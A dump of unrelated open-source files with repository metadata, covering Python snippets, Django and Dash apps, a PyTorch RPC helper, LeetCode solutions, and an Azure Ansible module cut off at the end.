# Getting more control over formatting from datetime import datetime now = datetime.now() print(now.strftime('%a %A %d')) print(now.strftime('%b %B %m')) print(now.strftime('%a %B %D')) print(now.strftime('%H : %M : %S %p')) print(now.strftime('%y %Y'))
bbab7556f06dd799a7a1c6cda3bc61ee1edfe69d
5f98e7c49e88ed0f1c6ea306de7d1a325129a253
/other_peoples_apps/basic_dash/dash3.py
44997a2911358a6521ac3b1c0d58f001d0ecfcf0
[]
no_license
simongarisch/basic_flask
d1e4c4dd8f4dc86e5603c9b4fc75dc6b455cdd48
5cdc5dc45a3a7c838b732e8fd068a28018f69475
refs/heads/master
2021-07-14T20:03:50.156056
2020-06-19T12:03:11
2020-06-19T12:03:11
172,444,123
1
0
null
2021-06-22T11:06:49
2019-02-25T06:04:07
Python
UTF-8
Python
false
false
965
py
import dash import dash_core_components as dcc import dash_html_components as html import pandas as pd df = pd.read_csv('https://gist.githubusercontent.com/chriddyp/c78bf172206ce24f77d6363a2d754b59/raw/c353e8ef842413cae56ae3920b8fd78468aa4cb2/usa-agricultural-exports-2011.csv') def generate_table(dataframe, max_rows=10): return html.Table([ html.Thead( html.Tr([html.Th(col) for col in dataframe.columns]) ), html.Tbody([ html.Tr([ html.Td(dataframe.iloc[i][col]) for col in dataframe.columns ]) for i in range(min(len(dataframe), max_rows)) ]) ]) external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css'] app = dash.Dash(__name__, external_stylesheets=external_stylesheets) app.layout = html.Div(children=[ html.H4(children='US Agriculture Exports (2011)'), generate_table(df) ]) if __name__ == '__main__': app.run_server(debug=True)
392882b39640d468c4b7d572a0d0d27040cbf237
ff4fe07752b61aa6404f85a8b4752e21e8a5bac8
/challenge-064/lubos-kolouch/python/ch-2.py
df2d2041c3bf0af4f2b2c7edaa47e508d404a077
[]
no_license
choroba/perlweeklychallenge-club
7c7127b3380664ca829158f2b6161c2f0153dfd9
2b2c6ec6ece04737ba9a572109d5e7072fdaa14a
refs/heads/master
2023-08-10T08:11:40.142292
2023-08-06T20:44:13
2023-08-06T20:44:13
189,776,839
0
1
null
2019-06-01T20:56:32
2019-06-01T20:56:32
null
UTF-8
Python
false
false
729
py
#!/usr/bin/env python # -*- coding: utf-8 -*- from typing import List def word_sequence(S: str, W: List[str]) -> List[str]: def helper(s: str, words: List[str]) -> List[str]: if not s: return words for word in W: if s.startswith(word): result = helper(s[len(word):], words + [word]) if result: return result return [] result = helper(S, []) return result if result else [0] S1 = "perlweeklychallenge" W1 = ["weekly", "challenge", "perl"] S2 = "perlandraku" W2 = ["python", "ruby", "haskell"] print(word_sequence(S1, W1)) # Output: ['perl', 'weekly', 'challenge'] print(word_sequence(S2, W2)) # Output: [0]
1df25303d1c26a2dab78b3710ad8715b1f99e1d7
ec78f8ab63aec0753b9360715a4276a971b78a82
/py/data_analysis/np/b_indexing.py
f4b2c805ca8dc1f3bc734fb3f68db8f06f0173bc
[]
no_license
anderscui/ml
4ace7e7b8cf248042d224bd54e81b691963b2e0e
39238ba6d802df7e8bf1089ef3605cfc83b333ac
refs/heads/master
2021-06-03T16:09:55.207202
2018-11-01T18:50:49
2018-11-01T18:50:49
23,989,214
0
0
null
null
null
null
UTF-8
Python
false
false
402
py
import numpy as np from numpy.random import randn names = np.array(['Bob', 'Joe', 'Will', 'Bob', 'Will', 'Joe', 'Joe']) data = randn(7, 4) print(names) print(data) print(names == 'Bob') print(data[names == 'Bob']) print(data[names == 'Bob', 2:]) print(data[names != 'Bob']) print(data[-(names == 'Bob')]) mask = (names == 'Bob') | (names == 'Will') print(data[mask]) data[data < 0] = 0 print(data)
a7ab3031e7812b193439335991eaa94fd5f32407
94e964496acd225e1a04060a9bc9f639e6cff99c
/app/invitations/urls.py
30974ba9c9a16fa13ba9b7f1760d580f40cb79b6
[]
no_license
indigocodeit/conflictcartographer
64b6ab2c991cd3ad020c4832cdb26974d342b564
ab19b4559c1e016ef485bfa1a01df17fb15679ce
refs/heads/master
2023-03-05T00:44:03.805241
2021-02-19T08:50:23
2021-02-19T08:50:23
null
0
0
null
null
null
null
UTF-8
Python
false
false
759
py
from django.urls import path, include from django.conf.urls import url from invitations.views import referralRedirect, referralSignup, handleExcelFile,fileuploadMenu, emailpreview,share urlpatterns =[ path("accounts/",include("django.contrib.auth.urls")), url("accounts/ref/(?P<refkey>[^/.]+)/$",referralRedirect, name="referral"), url("accounts/signup",referralSignup, name="referralSignup"), #path("accounts/signup",signup,name = "signup"), #path("accounts/bulkadd/",bulkAdd,name="bulkadd"), path("upload/invexcel/", handleExcelFile, name = "uploadexcel"), path("fileupload/", fileuploadMenu, name = "fileupload"), path("admin/invitations/emailpreview/<int:pk>/", emailpreview), path("api/share/",share,name="share") ]
b3ce5a872a19efb4767bc6923d50fc1851771e87
20348bd6e61f7019a696f2497a7b3c5c2d192796
/wowmode/admin.py
5851758c22a57ac5451904cdf44597e7f7843cf6
[]
no_license
hypnopompicindex/cms
fa9c3e70de71744506d1d4ccb3bf24a3b82e8b4d
81a634ca493385000e7028de632c5d9d04eeddaa
refs/heads/master
2021-06-26T23:05:16.022544
2019-04-01T04:21:26
2019-04-01T04:21:26
128,445,653
0
0
null
null
null
null
UTF-8
Python
false
false
660
py
from django.contrib import admin from .models import Videolist, Video from adminsortable2.admin import SortableAdminMixin, SortableInlineAdminMixin class VideoInline(SortableInlineAdminMixin, admin.TabularInline): model = Video readonly_fields = ('thumbnail', 'title') fields = ('order', 'title', 'file', 'thumbnail') template = "admin/wowmode/edit_inline/tabular.html" @admin.register(Videolist) class VideolistAdmin(SortableAdminMixin, admin.ModelAdmin): list_display = ['title', 'start_date', 'end_date', 'active'] list_editable = ('active',) fields = ('title', 'start_date', 'end_date', 'active') inlines = [VideoInline]
9dc0dba873157557aab7cbf28ec4ecb79b96e2db
9743d5fd24822f79c156ad112229e25adb9ed6f6
/xai/brain/wordbase/nouns/_revenue.py
d5ed97ac2bac6f928e632369e308122c3f31872d
[ "MIT" ]
permissive
cash2one/xai
de7adad1758f50dd6786bf0111e71a903f039b64
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
refs/heads/master
2021-01-19T12:33:54.964379
2017-01-28T02:00:50
2017-01-28T02:00:50
null
0
0
null
null
null
null
UTF-8
Python
false
false
342
py
#calss header class _REVENUE(): def __init__(self,): self.name = "REVENUE" self.definitions = [u'the income that a government or company receives regularly: '] self.parents = [] self.childen = [] self.properties = [] self.jsondata = {} self.specie = 'nouns' def run(self, obj1 = [], obj2 = []): return self.jsondata
2284e877ba7253ab2c2663b4f0763d61698a085c
9fae6f56ff77217aca8ae405a2bb2a2245461cc4
/backend/taxi_profile/migrations/0001_initial.py
19e1622e12af2de40a9c5cc0f883cee8ec77539c
[]
no_license
crowdbotics-apps/ready-18854
7c554b307dcab02274c10e31264712f607f6f01a
e37d0a3d3909b6defe071ffd9026511ae20db53c
refs/heads/master
2022-11-06T22:56:45.127940
2020-07-13T02:29:07
2020-07-13T02:29:07
279,189,411
0
0
null
null
null
null
UTF-8
Python
false
false
3,582
py
# Generated by Django 2.2.14 on 2020-07-13 02:28 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='UserProfile', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('mobile_number', models.CharField(blank=True, max_length=20, null=True)), ('photo', models.URLField(blank=True, null=True)), ('status', models.CharField(blank=True, max_length=50, null=True)), ('timestamp_created', models.DateTimeField(auto_now_add=True, null=True)), ('last_updated', models.DateTimeField(auto_now=True, null=True)), ('last_login', models.DateTimeField(blank=True, null=True)), ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='userprofile_user', to=settings.AUTH_USER_MODEL)), ], ), migrations.CreateModel( name='Notification', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('type', models.CharField(max_length=20)), ('message', models.TextField()), ('timestamp_created', models.DateTimeField(auto_now_add=True)), ('users', models.ManyToManyField(related_name='notification_users', to=settings.AUTH_USER_MODEL)), ], ), migrations.CreateModel( name='InviteCode', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('code', models.CharField(max_length=20)), ('timestamp_created', models.DateTimeField(auto_now_add=True)), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invitecode_user', to=settings.AUTH_USER_MODEL)), ], ), migrations.CreateModel( name='DriverProfile', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('mobile_number', models.CharField(max_length=20)), ('photo', models.URLField()), ('driver_status', models.CharField(max_length=50)), ('timestamp_created', models.DateTimeField(auto_now_add=True)), ('last_updated', models.DateTimeField(auto_now=True)), ('last_login', models.DateTimeField()), ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='driverprofile_user', to=settings.AUTH_USER_MODEL)), ], ), migrations.CreateModel( name='Document', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=255)), ('file', models.URLField()), ('description', models.TextField(blank=True, null=True)), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='document_user', to=settings.AUTH_USER_MODEL)), ], ), ]
4dbe179017640dc1772bf32986f395dcfe46257c
c36679186f669c6e3bd1c106c96d4a17be1f5ab1
/Practice_Anisul/149.py
0787f34ea6607e53a80621276df0598ec6b76a36
[]
no_license
touhiduzzaman-tuhin/python-code-university-life
60a3d671b200a6f5222c6d176c13c5f20f013509
6d2e3d90d430faa5c83fe79e7fb1ebe516994762
refs/heads/master
2023-03-22T15:18:10.636203
2021-03-06T18:52:04
2021-03-06T18:52:04
332,467,190
0
0
null
null
null
null
UTF-8
Python
false
false
191
py
tpl = ( 1, 3, 6, 4, "Tuhin", "Rana", (1, 2, 3) ) print(tpl) print(tpl[0]) print(tpl[1]) print(tpl[2]) print(tpl[3]) print(tpl[4]) print(tpl[6]) print(tpl[6][1])
b06ce99b3d9241be378b1a68cabcf4a2a08191f0
d91365b9da3cbd3a4c928591f25e55e615a61ebb
/torchbiggraph/rpc.py
f8cf4cc00eeb223c99249d384e23d4f10febd204
[ "BSD-3-Clause" ]
permissive
pandeyankit83/PyTorch-BigGraph
052ff88804bba8353a12385c5547445cdb22700b
79e7fc06621ca7737689fa50c1e6cf6cea550a90
refs/heads/master
2022-12-05T02:16:52.169026
2020-06-22T17:29:36
2020-06-22T17:30:44
277,336,532
3
1
NOASSERTION
2022-11-27T03:29:15
2020-07-05T16:04:10
Python
UTF-8
Python
false
false
5,714
py
#!/usr/bin/env python3 # Copyright (c) Facebook, Inc. and its affiliates. # All rights reserved. # # This source code is licensed under the BSD-style license found in the # LICENSE file in the root directory of this source tree. import io import sys import traceback import numpy as np import torch import torch.distributed as td # FIXME: is it efficient to torch.save into a buf? It's going to have to copy # all the tensors. def _serialize(data): buf = io.BytesIO() torch.save(data, buf) data_bytes = buf.getvalue() # FIXME: how to properly copy bytes to ByteTensor? t = torch.from_numpy(np.frombuffer(data_bytes, dtype=np.uint8)) return t def _deserialize(t): data_bytes = t.numpy().tobytes() buf = io.BytesIO(data_bytes) return torch.load(buf) def send(data, dst): """ Sends an arbitrary torch-serializable object to a destination node. This is a blocking send, equivalent to `torch.distributed.send`. Args: data: An arbitrary torch-serializable object to be sent. dst: The rank of the destination node. """ # FIXME: we've got to get rid of this two-pass nonsense for dynamically sized # send and receive. t = _serialize(data) sizet = torch.LongTensor([t.nelement()]) td.send(sizet, dst) td.send(t, dst) def recv(src=None): """ Receives an arbitrary torch-serializable object from a source node. This is a blocking receive, `torch.distributed.recv` Args: src: The rank of the source node. If None, will receive from any rank. Returns: data: The data send from the source node. src: The rank of the source node. """ sizet = torch.LongTensor(1) src = td.recv(sizet, src) t = torch.ByteTensor(sizet.item()) td.recv(t, src) return _deserialize(t), src _JOIN_KEY = "seU17sb9nwqDZhsH9AyW" class Server(object): """Base class for an RPC server using `torch.distributed`. Users should subclass this class and add the server methods. Example: init_method = "file://myfile.tmp" num_clients = 1 torch.distributed.init_process_group('gloo', init_method=init_method, world_size=num_clients + 1, rank=0) class MyServer(Server): def test_func(self, T, k=0): return ("the result is ", T + k) s = MyServer(num_clients) s.start() # will block until all clients have called `join()` """ def __init__(self, num_clients): """ Args: num_clients: The number of clients that will call `join()` upon completion. """ self.num_clients = num_clients def start(self, groups=None): join_clients = [] while True: rpc, src = recv() if rpc == _JOIN_KEY: join_clients += [src] if len(join_clients) == self.num_clients: for client in join_clients: # after sending the join cmd, # each client waits on this ack to know everyone is done # and it's safe to exit send(_JOIN_KEY, client) break else: F, args, kwargs = rpc try: res = getattr(self, F)(*args, **kwargs) send((False, res), src) except BaseException as e: # should we print the exception on the server also? # traceback.print_exc() exc_str = traceback.format_exc() send((True, (e, exc_str)), src) class Client(object): """A client for connecting to a subclass of `rpc.Server`. Example: init_method = "file://myfile.tmp" num_clients = 1 torch.distributed.init_process_group('gloo', init_method=init_method, world_size=num_clients + 1, rank=1) c = Client(MyServer, server_rank=0) print(c.test_func(torch.arange(0, 3), k=2)) # ('the result is ', tensor([ 2, 3, 4])) c.join() """ def __init__(self, server_class, server_rank): """ Args: server_class: The class of the server object. This should be a subclass of `rpc.Server`. server_rank: The rank of the node where the `rpc.Server` is running. """ self.server_class = server_class self.server_rank = server_rank def __getattr__(self, name): if name not in dir(self.server_class): raise AttributeError( "%s has no attribute %s" % (self.server_class.__name__, name) ) func = getattr(self.server_class, name) if not isinstance(func, type(lambda: 1)): # FIXME raise TypeError("%s object is not callable" % (type(func))) def inner(*args, **kwargs): send((name, args, kwargs), self.server_rank) (is_exception, res), _src = recv(self.server_rank) if not is_exception: return res else: exc, exc_str = res print(exc_str, file=sys.stderr) raise exc return inner def join(self): """Should be called by each client upon completion, to ensure a clean exit. """ send(_JOIN_KEY, self.server_rank) recv(self.server_rank)
b21d14a806472b97f7bf97745f271b6370e98277
8520c991dc543f5f4e1efe59ab401824173bb985
/63-unique-paths-ii/solution.py
dea9fccf6e2786fb22f3e04e49bad454437956f9
[]
no_license
katryo/leetcode
d44f70f2853c4f5ea9a462d022feb0f5436c2236
0da45559271d3dba687858b8945b3e361ecc813c
refs/heads/master
2020-03-24T12:04:53.859047
2020-02-18T04:27:55
2020-02-18T04:27:55
142,703,107
0
0
null
null
null
null
UTF-8
Python
false
false
1,783
py
# A robot is located at the top-left corner of a m x n grid (marked 'Start' in the diagram below). # # The robot can only move either down or right at any point in time. # The robot is trying to reach the bottom-right corner of the grid (marked 'Finish' in the diagram below). # # Now consider if some obstacles are added to the grids. How many unique paths would there be? # An obstacle and empty space is marked as 1 and 0 respectively in the grid. # # Note: m and n will be at most 100. # # Example 1: # # Input: # [ # [0,0,0], # [0,1,0], # [0,0,0] # ] # Output: 2 # Explanation: # There is one obstacle in the middle of the 3x3 grid above. # There are two ways to reach the bottom-right corner: # 1. Right -> Right -> Down -> Down # 2. Down -> Down -> Right -> Right class Solution(object): def uniquePathsWithObstacles(self, obstacleGrid): """ :type obstacleGrid: List[List[int]] :rtype: int """ if not obstacleGrid: return 0 if not obstacleGrid[0]: return 0 table = [[-1] * len(obstacleGrid[0]) for _ in range(len(obstacleGrid))] table[0][0] = 1 def paths(row, col): if row < 0 or col < 0 or row >= len(obstacleGrid) or col >= len(obstacleGrid[0]): return 0 if obstacleGrid[row][col]: return 0 if table[row][col] != -1: return table[row][col] ret = paths(row-1, col) + paths(row, col-1) table[row][col] = ret return ret ans = paths(len(obstacleGrid)-1, len(obstacleGrid[0])-1) return ans # s = Solution() # grid = [ # [0, 0, 0], # [0, 1, 0], # [0, 0, 0], # [1, 0, 0] # ] # print(s.uniquePathsWithObstacles(grid))
a311f00d4d3dc50b38cd6be0089d3287ffd215ea
53b307ed3c23c08ad95c46e4ed1b79ceb8cd3fe9
/panels/apps.py
7f4399c55c7fb010e218dd443330883d083231cd
[ "MIT" ]
permissive
mesebilisim/iotdashboard
e14fc66ecf03d109f01f5fc9253003dd676680cf
2e974d55015071f61e3d990f0d63d756a4763c24
refs/heads/master
2020-05-23T11:15:56.599010
2017-07-12T10:07:21
2017-07-12T10:07:21
68,567,736
0
0
null
2016-09-19T03:58:14
2016-09-19T03:58:14
null
UTF-8
Python
false
false
128
py
from __future__ import unicode_literals from django.apps import AppConfig class PanelsConfig(AppConfig): name = 'panels'
5dd3932daaae916d3a661747d79488a75852095f
bc531b7d1819ca5b8ba9d42395ce9e4676978fe1
/Chapter01/16_for_example.py
ed6310c3390261c1f4855fd75e4be6848680186a
[ "MIT" ]
permissive
PacktPublishing/Mastering-Python-Scripting-for-System-Administrators-
b72cacd9c54a3d9ec49100b2e5a49532960d58cc
d6ad3ea82ff503083176808166f727f52b187325
refs/heads/master
2023-01-27T19:56:06.109090
2023-01-18T09:00:19
2023-01-18T09:00:19
161,440,105
175
216
MIT
2022-10-08T19:33:46
2018-12-12T06:00:41
Python
UTF-8
Python
false
false
106
py
numbers = [6, 5, 3, 8, 4, 2, 5, 4, 11] sum = 0 for i in numbers: sum = sum + i print("The sum is", sum)
82ce6bb03f39e5756d72aef556a8417aa39e95cc
53fab060fa262e5d5026e0807d93c75fb81e67b9
/backup/user_083/ch77_2020_04_22_18_33_29_505824.py
5dc8be2d1349c4c3b224e2d146ccfba098fc6d3c
[]
no_license
gabriellaec/desoft-analise-exercicios
b77c6999424c5ce7e44086a12589a0ad43d6adca
01940ab0897aa6005764fc220b900e4d6161d36b
refs/heads/main
2023-01-31T17:19:42.050628
2020-12-16T05:21:31
2020-12-16T05:21:31
306,735,108
0
0
null
null
null
null
UTF-8
Python
false
false
234
py
def calcula_tempo(dnomes_aceleração): novodic={} V=[] tempo=[] for i in range(len(dnomes_aceleração)) and a in dnomes_aceleração.values(): tempo=(V[i])/a[i] novodic=nome[tempo] return novodic
e0aec4b793d9baf3e77815a97b1a6fcda4f09d46
2ce27b05f45cef6ce3ae5c02b8e83e548def2fc6
/ADVANCE/Modules/Renaming the module.py
3ec25656a999a01846ceee8a874dac28e2766867
[]
no_license
Ajay2521/Python
775b7d99736e83e4d0c37302b91d1413dd2c0d3b
a426dd7717de8a5e60e584d208ae7120bb84c1b3
refs/heads/master
2022-12-01T17:49:12.672061
2020-08-15T14:55:12
2020-08-15T14:55:12
273,632,074
1
0
null
null
null
null
UTF-8
Python
false
false
848
py
# lets see about "Renaming a Modules" in python. # It is possible to import the module by using specific user defined name called as "alias name". # It is posssibile to access the functionality of the module by using its "alias name" which was declared while importing the module. # Syntax for renaming a module is: # import moduleName as aliasName # Here is the program which is used to import module "Calculate.py" by using an alias name. import Calculate as Cal # Getting user input for variables a and b. a = int( input ( "\nEnter a value for \"a\" : " ) ) b = int( input ( "\nEnter a value for \"b\" : " ) ) # Accessing the functionality present in the module "Calculate" using alias name by using dot( . ) operator. Cal.Add( a, b) Cal.Multi( a,b ) print( ) # Used to print new line for readability.
96a80deed9c0cdafbb52abf608c43ee8b5a7308a
cf4c9b102ab3a2720a045ad0b4c0b1d610738102
/shrike-examples/pipelines/experiments/demo_chain_components.py
a82c9bfd1775806779047e1a23422ef47d93bb33
[ "MIT", "LicenseRef-scancode-generic-cla" ]
permissive
isabella232/azure-ml-problem-sets
a7c0b0070b08598e5f473c91e47cad1fc3525a9b
5e6a3227032e51bb224a1085dc4f9ee9f8bd1dcf
refs/heads/main
2023-07-12T11:49:58.465710
2021-08-12T17:02:11
2021-08-12T17:02:11
null
0
0
null
null
null
null
UTF-8
Python
false
false
5,297
py
""" The Azure ML pipeline that demonstrates how to chain components together. to execute: > python pipelines/experiments/demo_chain_components.py --config-dir pipelines/config --config-name experiments/demo_chain_components run.submit=True """ # pylint: disable=no-member # NOTE: because it raises 'dict' has no 'outputs' member in dsl.pipeline construction import os import sys from dataclasses import dataclass from typing import Optional from azure.ml.component import dsl from shrike.pipeline.pipeline_helper import AMLPipelineHelper # NOTE: if you need to import from pipelines.* ACCELERATOR_ROOT_PATH = os.path.abspath( os.path.join(os.path.dirname(__file__), "..", "..") ) if ACCELERATOR_ROOT_PATH not in sys.path: print(f"Adding to path: {ACCELERATOR_ROOT_PATH}") sys.path.append(str(ACCELERATOR_ROOT_PATH)) class ChainComponentsDemo(AMLPipelineHelper): """Runnable/reusable pipeline helper class This class inherits from AMLPipelineHelper which provides helper functions to create reusable production pipelines. """ def build(self, config): """Builds a pipeline function for this pipeline using AzureML SDK (dsl.pipeline). This method returns a constructed pipeline function (decorated with @dsl.pipeline). Args: config (DictConfig): configuration object Returns: dsl.pipeline: the function to create your pipeline """ # helper functions below load the subgraph/component from registered or local version depending on your config.run.use_local probe_component = self.component_load("probe") # Here you should create an instance of a pipeline function (using your custom config dataclass) @dsl.pipeline( name="demo-chain-components", description="The Azure ML demo of a graph where components are chained, i.e. the input of a component is the output of an upstream component.", default_datastore=config.compute.compliant_datastore, ) def demo_pipeline_function(probe_dataset): """Pipeline function for this graph. Args: probe_dataset (FileDataset): input dataset (usually obtained through extraction from Heron portal) Returns: dict[str->PipelineOutputData]: a dictionary of your pipeline outputs for instance to be consumed by other graphs """ # general syntax: # module_instance = module_class(input=data, param=value) # or # subgraph_instance = subgraph_function(input=data, param=value) probe_component_step_1 = probe_component( input_data=probe_dataset, scan_args=config.probe1.scan_args, scan_deps=config.probe1.scan_deps, scan_input=config.probe1.scan_input, scan_env=config.probe1.scan_env, verbose=config.probe1.verbose, ) self.apply_recommended_runsettings( "probe", probe_component_step_1, gpu=True ) probe_component_step_2 = probe_component( input_data= # To-Do: this is where you need to connect teh output from the first probe component scan_args=config.probe2.scan_args, scan_deps=config.probe2.scan_deps, scan_input=config.probe2.scan_input, scan_env=config.probe2.scan_env, # here we're using a different parameter verbose=config.probe2.verbose, ) self.apply_recommended_runsettings( "probe", probe_component_step_2, gpu=True ) # return {key: output} return {"subgraph_results": probe_component_step_2.outputs.results} # finally return the function itself to be built by helper code return demo_pipeline_function def pipeline_instance(self, pipeline_function, config): """Given a pipeline function, creates a runnable instance based on provided config. This is used only when calling this as a runnable pipeline using .main() function (see below). The goal of this function is to map the config to the pipeline_function inputs and params. Args: pipeline_function (function): the pipeline function obtained from self.build() config (DictConfig): configuration object Returns: azureml.core.Pipeline: the instance constructed with its inputs and params. """ # NOTE: self.dataset_load() helps to load the dataset based on its name and version pipeline_input_dataset = self.dataset_load( name=config.inputs.input_data, version=config.inputs.input_data_version, ) # when all inputs are obtained, we call the pipeline function probe_pipeline = pipeline_function(probe_dataset=pipeline_input_dataset) # and we return that function so that helper can run it. return probe_pipeline # NOTE: main block is necessary only if script is intended to be run from command line if __name__ == "__main__": # calling the helper .main() function ChainComponentsDemo.main() # comment to bypass caching
bdd46ea024647f32161f4a683728f074d4063515
3ec3de2e1bdfe2890084f15ac4b0f0714aeff096
/collective/elasticsearch/brain.py
96b5288c5a80a83427d9c29de053589df5f03708
[]
no_license
eea/collective.elasticsearch
7d6afc0b5f66810ab7b3a6b8aa1835a187a07f7e
baaaa73245b4866936383b001f0dda17ad991846
refs/heads/master
2023-08-01T03:34:51.375866
2013-06-06T15:42:01
2013-06-06T15:42:01
null
0
0
null
null
null
null
UTF-8
Python
false
false
3,008
py
from Acquisition import Implicit, aq_get from Products.ZCatalog.interfaces import ICatalogBrain from zope.interface import implements from zope.globalrequest import getRequest from Products.CMFPlone.utils import pretty_title_or_id from collective.elasticsearch.ejson import loads _marker = [] class Brain(Implicit): """ A special brain implementation that uses the results from elasticsearch to load the brain. """ implements(ICatalogBrain) __allow_access_to_unprotected_subobjects__ = True def __init__(self, data, catalog): self._idata = data self._raw_data = self._idata['_metadata'] self._data = None self._catalog = catalog @property def data(self): if self._data is None: self._data = loads(self._raw_data) return self._data def has_key(self, key): return key in self.data __contains__ = has_key @property def pretty_title_or_id(self): return pretty_title_or_id(self._catalog, self) def __getattr__(self, name, default=_marker): if name == 'REQUEST': request = aq_get(self._catalog, 'REQUEST', None) if request is None: request = getRequest() return request elif name[0] == '_': try: return self.__dict__[name] except KeyError: if default == _marker: raise AttributeError(name) else: return default if name in self.data: return self.data[name] elif name.startswith('portal_'): # XXX really ugly... return aq_get(self._catalog, name) def getPath(self): return '/'.join(self.getRawPath()) def getRawPath(self): try: # need to convert to string because we get # unicode from elastic path = self.data['_path'] newpath = [] for part in path: newpath.append(str(part)) return tuple(newpath) except KeyError: return () def getURL(self, relative=0): request = aq_get(self._catalog, 'REQUEST', None) if request is None: request = getRequest() return request.physicalPathToURL(self.getPath(), relative) def _unrestrictedGetObject(self): return self._catalog.unrestrictedTraverse(self.getPath()) def getObject(self, REQUEST=None): path = self.getRawPath() if not path: return None if len(path) > 1: parent = self._catalog.unrestrictedTraverse(path[:-1]) else: return '' return parent.restrictedTraverse(path[-1]) def getRID(self): """Return the record ID for this object.""" return self.data.get_id() def BrainFactory(catalog): def factory(result): brain = Brain(result, catalog) return brain.__of__(catalog) return factory
95782f795681aa0df4a8250fe3ef599924447b85
9c7958f4c55d33d8bb0175600f169c060aa11f6f
/scripts/motifplot.py
ad3e8622dea75d1e259bb09292c37938b7b13e2b
[]
no_license
knutdrand/snakemakes
a245de79119dc0dc982f85e846149e3754ef64a9
9dd2355271d3da8d4767f7dac877f65f62d1aa9b
refs/heads/master
2021-03-29T07:52:44.110983
2020-10-09T13:27:45
2020-10-09T13:27:45
247,933,836
0
0
null
null
null
null
UTF-8
Python
false
false
445
py
import matplotlib matplotlib.use("Agg") import matplotlib.pyplot as plt import numpy as np get_name = lambda parts: f"{parts[0]}:{parts[1]}-{parts[2]}" matches = {line.split("\t")[2] for line in open(snakemake.input[0]) if not line.startswith("#") and line.strip()} hits = [get_name(line.split()) in matches for line in open(snakemake.input[1])] ratio = np.cumsum(hits)/np.arange(1, len(hits)+1) plt.plot(ratio) plt.savefig(snakemake.output[0])
445eb26dceab288fcefe4c720a8fa3fbc6b81d7d
2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae
/python/python_7494.py
b38b7c1f41b50bf66fd918b09831b5f03145d689
[]
no_license
AK-1121/code_extraction
cc812b6832b112e3ffcc2bb7eb4237fd85c88c01
5297a4a3aab3bb37efa24a89636935da04a1f8b6
refs/heads/master
2020-05-23T08:04:11.789141
2015-10-22T19:19:40
2015-10-22T19:19:40
null
0
0
null
null
null
null
UTF-8
Python
false
false
62
py
# Clean URL with BeautifulSoup for url in urls: print url
18632c639d4fef98ebd9a9968a695fcee2060ef2
64bf39b96a014b5d3f69b3311430185c64a7ff0e
/intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/azure/azcollection/plugins/modules/azure_rm_postgresqlconfiguration.py
0fb4da64c8f89a0b4fe91409820956533bfbbb59
[ "GPL-1.0-or-later", "GPL-3.0-only", "LicenseRef-scancode-unknown-license-reference", "MIT" ]
permissive
SimonFangCisco/dne-dna-code
7072eba7da0389e37507b7a2aa5f7d0c0735a220
2ea7d4f00212f502bc684ac257371ada73da1ca9
refs/heads/master
2023-03-10T23:10:31.392558
2021-02-25T15:04:36
2021-02-25T15:04:36
342,274,373
0
0
MIT
2021-02-25T14:39:22
2021-02-25T14:39:22
null
UTF-8
Python
false
false
8,121
py
#!/usr/bin/python # # Copyright (c) 2019 Zim Kalinowski, (@zikalino) # # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: azure_rm_postgresqlconfiguration version_added: "0.1.2" short_description: Manage Azure PostgreSQL Configuration description: - Update or reset Azure PostgreSQL Configuration setting. options: resource_group: description: - The name of the resource group that contains the resource. required: True server_name: description: - The name of the server. required: True name: description: - Setting name. required: True value: description: - Setting value. state: description: - Assert the state of the PostgreSQL setting. Use C(present) to update setting, or C(absent) to reset to default value. default: present choices: - absent - present extends_documentation_fragment: - azure.azcollection.azure author: - Zim Kalinowski (@zikalino) ''' EXAMPLES = ''' - name: Update PostgreSQL Server setting azure_rm_postgresqlconfiguration: resource_group: myResourceGroup server_name: myServer name: deadlock_timeout value: 2000 ''' RETURN = ''' id: description: - Resource ID. returned: always type: str sample: "/subscriptions/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/resourceGroups/myResourceGroup/providers/Microsoft.DBforPostgreSQL/servers/myServer/confi gurations/event_scheduler" ''' import time try: from ansible_collections.azure.azcollection.plugins.module_utils.azure_rm_common import AzureRMModuleBase from msrestazure.azure_exceptions import CloudError from msrest.polling import LROPoller from azure.mgmt.rdbms.postgresql import MySQLManagementClient from msrest.serialization import Model except ImportError: # This is handled in azure_rm_common pass class Actions: NoAction, Create, Update, Delete = range(4) class AzureRMPostgreSqlConfigurations(AzureRMModuleBase): def __init__(self): self.module_arg_spec = dict( resource_group=dict( type='str', required=True ), server_name=dict( type='str', required=True ), name=dict( type='str', required=True ), value=dict( type='str' ), state=dict( type='str', default='present', choices=['present', 'absent'] ) ) self.resource_group = None self.server_name = None self.name = None self.value = None self.results = dict(changed=False) self.state = None self.to_do = Actions.NoAction super(AzureRMPostgreSqlConfigurations, self).__init__(derived_arg_spec=self.module_arg_spec, supports_check_mode=True, supports_tags=False) def exec_module(self, **kwargs): for key in list(self.module_arg_spec.keys()): if hasattr(self, key): setattr(self, key, kwargs[key]) old_response = None response = None old_response = self.get_configuration() if not old_response: self.log("Configuration instance doesn't exist") if self.state == 'absent': self.log("Old instance didn't exist") else: self.to_do = Actions.Create else: self.log("Configuration instance already exists") if self.state == 'absent' and old_response['source'] == 'user-override': self.to_do = 